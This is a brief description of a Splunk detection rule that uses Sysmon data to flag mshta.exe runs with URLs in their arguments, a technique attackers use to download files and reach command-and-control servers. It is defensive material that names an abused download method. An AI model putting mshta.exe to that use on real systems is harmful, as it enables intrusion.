This detection rule focuses on the execution of `mshta.exe`, a Windows utility often exploited by threat actors to download files via web URLs embedded in their command line arguments. By monitoring for this activity within processes, the rule aims to identify unauthorized downloads that may indicate command-and-control (C2) communications or other malicious activities. The logic is built on the capabilities of the Splunk platform, leveraging the Sysmon event for endpoint data collection. It captures events where `mshta.exe` is executed and contains a URL pattern, categorizing them for further analysis.